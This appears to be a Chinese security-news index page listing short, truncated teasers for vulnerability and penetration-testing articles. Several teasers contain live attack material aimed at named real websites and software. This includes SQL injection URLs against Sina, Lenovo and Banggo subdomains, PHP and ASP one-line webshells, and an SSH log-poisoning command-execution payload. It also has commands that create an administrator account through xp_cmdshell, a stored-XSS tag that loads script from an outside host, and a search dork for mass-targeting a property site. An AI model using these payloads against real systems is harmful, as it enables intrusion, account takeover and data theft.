SN News <= 1.2管理权限验证绕过及注射 - 网站安全关注热度:19

SN News = 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability影响版本 1.2下载地址: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news作者不为任何危害负责#############.....[详情]

Wordpress插件Front File Manager 0.1任意文件上传漏洞关注热度:10

标题: Wordpress front file manager 0.1 Arbitrary File Upload作者: Adrien Thierrywww.2cto.com http://www.webikon.sk/en下载地址: http://downloads.wordpress.org/plugin/front-file-manager......[详情]

自动化web安全测试动态fuzz思路与实践(一) - 网站关注热度:30

0times;01 乱谈很久之前就想写这么一篇文章，来谈谈我认为的的web2.0甚至是3.0时代，web应用安全测试遇到的几个问题，以及目前知道的解决办法。发出来供大家讨论学习，算是抛砖引玉吧..[详情]

Discuz!X2.5Release20120407版命令执行及修复方案 - 网站关注热度:15

Discuz!X2.5Release20120407版命令执行，官方4月13号更新了，但没提示更新内容和后台没提示升级！今天无意看了一下官网版本，发现更新了http://www.discuz.net/thread-2744369-1-1.html于是对比，发现修..[详情]

联想扬天品牌子站SQL注射漏洞 - 网站安全 - 自学关注热度:20

未进一步测试，请厂商及时的修补漏洞。http://yangtian.lenovo.com.cn/2012/detail.php?fup=44fid=48参数fup存在注射漏洞root权限哦，亲数据表只猜解了一点修复方案：过滤+ display_errors=off作者：Coody..[详情]

新浪某城市联盟分站存在SQL注入漏洞 - 网站安全关注热度:19

SQL注入点：http://spring.sina-qd.com/more.php?class_id=39获取库名及其他信息：http://spring.sina-qd.com/more.php?class_id=39%20and%201=2%20UNION%20SELECT%201,2,3,CONCAT_WS%28CHAR%2832,58,32%29,user.....[详情]

众乐活动平台建站系统sql注射及修复 - 网站安全关注热度:15

众乐活动平台建站系统存在mysql injection 严重漏洞，建设的系统包括蒙牛酸酸乳等等有一定影响力的网站。其中蒙牛酸酸乳数据库中存有大量新浪，人人用户登录的授权token信息详细说明..[详情]

在线订单站的一些渗透思路和后门 - 网站安全关注热度:17

作者：黑面上现在出现了很多单页面单产品的在线网购站，很多童鞋看了认为很难下手，完全没有思路，其实有的站还是很简单的，我大概总结下我碰到的一些漏洞和后门。ASP的站基本..[详情]

自己写的php木马webshell扫描器 - 网站安全 - 自学关注热度:16

因为前端时间服务器被放过 所以写了个webshell扫描器 呵呵 专杀php webshell 不管大马还是小马 包括一句话 现在放出代码来?php/*+-------------------------------------------------------------------.....[详情]

ASPCMS系统后台拿webshell - 网站安全 - 自学php关注热度:18

点击界面风格，然后选编辑模板/CSS文件，然后添加模板，文件名称写error.asp;.html，文件内容写一句话%eval request(123)%。然后添加，会提示添加成功，然后在模板列表中就可以找到我们添加..[详情]

一句话再过护卫神 - 网站安全 - 自学php关注热度:23

nono ?phpeval($_POST[1])?木啥特别之处。只是换行而已！灵活变通。无所不能.本文由左泪发表..[详情]

1433提权限制修复资料整理总结 - 网站安全 - 自学关注热度:16

net user SQLDebugger list /addnet localgroup administrators SQLDebugger /addError Message:未能找到存储过程 lsquo;master..xp_cmdshellrsquo;。修复法：很通用的，其实碰到 其他126 127的都.....[详情]

利用SSH来包含执行命令 - 网站安全 - 自学php关注热度:25

文章的总体思路就是：使用ssh #39;pre?echo system($_GET[#39;cmd#39;]); exit;?#39;@10.10.11.33登入，然后会在ssh的登入日志里记录，再让存在包含漏洞php去包含错误日志文件来达到目的。包含正常的..[详情]

腾讯拍拍网多处xss及修复 - 网站安全 - 自学php关注热度:38

3处xss，两处钓鱼好，还一处耍着玩！http://sse1.paipai.com/s-hl1w6sgwpq3jv6gxk3tz23ovrtxc835spuv1h25mi6xw2o5wpq3jv6gxk2--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.htmlhttp://shop.paipai.com/556.....[详情]

焦点房产网严重漏洞可致所有地方分站被秒 - 网关注热度:10

血案入口是developer_intro.php存在的问题。致所有站点挂掉。allinurl:site:focus.cn developer_intro.php?ID= 800多个哦。http://cq.focus.cn/vote/developer_intro.php?ID=1548root权限。 www.2cto.comhttp.....[详情]

aspcms任意用户密码重置及修复方案 - 网站安全关注热度:20

aspcms会员中心的某些页面，对用户的验证存在缺陷，修改cookie后提交即可重置任意用户的帐号信息。#39;member/reg.aspdim action : action=getform(action,get)if action = reg then addUser()el.....[详情]

美特斯邦威官方商城某盲注和某union注入 - 网站安关注热度:39

美特斯邦威官方商城某盲注，赞一下厂商，漏洞响应很快，修复得很快，也加了防注。。找了很久才发现这小问题。。再修一下吧。。。http://me-city.banggo.com/Goods/comments?good_id=556375user_i..[详情]

友情检测中国书画联盟以及站长网站 - 网站安全关注热度:7

学校旁边有一家书法，跟画室，因为他家吃饭（开饭店的）对其佩服~百度搜索到了他的工作室，发现居然还有个人网站，无语了。一看下去更加惊讶，竟然还创办了中国书画联盟。。。..[详情]

PHPMyWind v4.5.2 0day - 网站安全 - 自学php关注热度:14

代码：define(#39;PHPMYWIND_INC#39;, preg_replace(/[\/\\\\]{1,}/, #39;/#39;, dirname(__FILE__)));define(#39;PHPMYWIND_ROOT#39;, preg_replace(/[\/\\\\]{1,}/, #39;/#39;, substr(PHPM.....[详情]

反向代理在Web渗透测试中的运用 - 网站安全 - 自关注热度:32

在一次Web渗透测试中，目标是M国的一个Win+Apache+PHP+MYSQL的网站，独立服务器，对外仅开80端口，网站前端的业务系统比较简单，经过几天的测试也没有找到漏洞，甚至连XSS都没有发现，..[详情]

SHELL突破安全狗远程登录连接限制 - 网站安全 -关注热度:17

默认安装路径C:\Program Files\SafedogServerC:\Program Files\SafedogServer\SafeDogGuardCenter下载ProGuardData.ini 文件到本地，然后本地安装安全狗，覆盖本地的安装目录，覆盖失败。更改www.2cto.com C.....[详情]

zen cart安全漏洞–防黑必看 - 网站安全 - 自学ph关注热度:41

www.2cto.com：前面发过：http://www.2cto.com/Article/201206/134369.html红黑联盟旗下护航网(www.hhsafe.com)最接受的一个网站渗透测试和修复工作就是使用的zen cart，问题非常多。最近某网站被入侵，通..[详情]

大旗网论坛和精品体验子站SQL注入 - 网站安全关注热度:15

有两处SQL注入分别是：http://bbs.daqi.com/cgi-bin/bbs/author.cgi?author=test#39;http://try.daqi.com/cgi-bin/experience/exp_active_email?key=testuid=test#39;xmysql::query() error: You have an.....[详情]

骑士cms任意目录打包下载漏洞(74cms v3.1.20120214)关注热度:16

74cms_v3.1.20120214中任意web目录打包下载。。。很有意思的漏洞74cms后台有一个备份模板的功能，程序会自动备份选中的模板并压缩下载，但是没有对用户提交的$tpl变量进行检查就带入函数..[详情]

美特斯邦威官方商城及大赛子站两处盲注 - 网站关注热度:20

美特斯邦威官方商城某两处盲注详细说明：盲注一：http://www.banggo.com/Search.shtml?cid=1dis=[0-9.5]ad=155%20order%20by%2017%23http://www.banggo.com/Search.shtml?cid=1dis=[0-9.5]ad=155%20and%201=.....[详情]

shopEX商城后台对上传模板包过滤不严致可上传木关注热度:13

shopx系列产品，可能是编程习惯问题，对上传的模板包，过滤不严，导致上传攻击文件，如果权限设置比较严，可能会失效，但是危害还是非常大的。形成这个漏洞的原因，可能是程序员..[详情]

优酷&土豆的XSS - 网站安全 - 自学php关注热度:14

优酷和土豆结合了，两者的漏洞也是如此的相似。夫唱妇随。详细说明：因为一些基本的安全常识不到位，导致了存储型xss。漏洞证明：测试代码：/textareascript src=http://tmxk.org/m/q.js/scr..[详情]

web安全之信息刺探防范（上） - 网站安全 - 自学关注热度:14

#----------------------------------------------------------## ====红色字体 -特指煮酒个人所见。加粗则为需要重点注意。## ====蓝色加粗 -特指与本文相关人员，包括参与修正的朋友。## ==== 煮酒品.....[详情]

我的搜狐9处持久型及反射型xss及搜狐邮箱3处反射关注热度:62

主要是http://i.sohu.com/持久型及反射型xss9处详细说明：持久型：http://i.sohu.com/app/friend/#/a/search/user/search/find.do?_input_encode=UTF-8nick=xsser反射型：http://i.sohu.com/a/register/passpor.....[详情]

新浪邮箱word文档处持久型xss - 网站安全 - 自学关注热度:19

通过修改word文档的属性！邮件在获取word文档属性时，虽然注释了，但没有过滤，可绕过！还有通过在word文档添加超链接也是一样！修改属性为:/o:Author/xml--/stylescriptalert(/goderci/)/script当..[详情]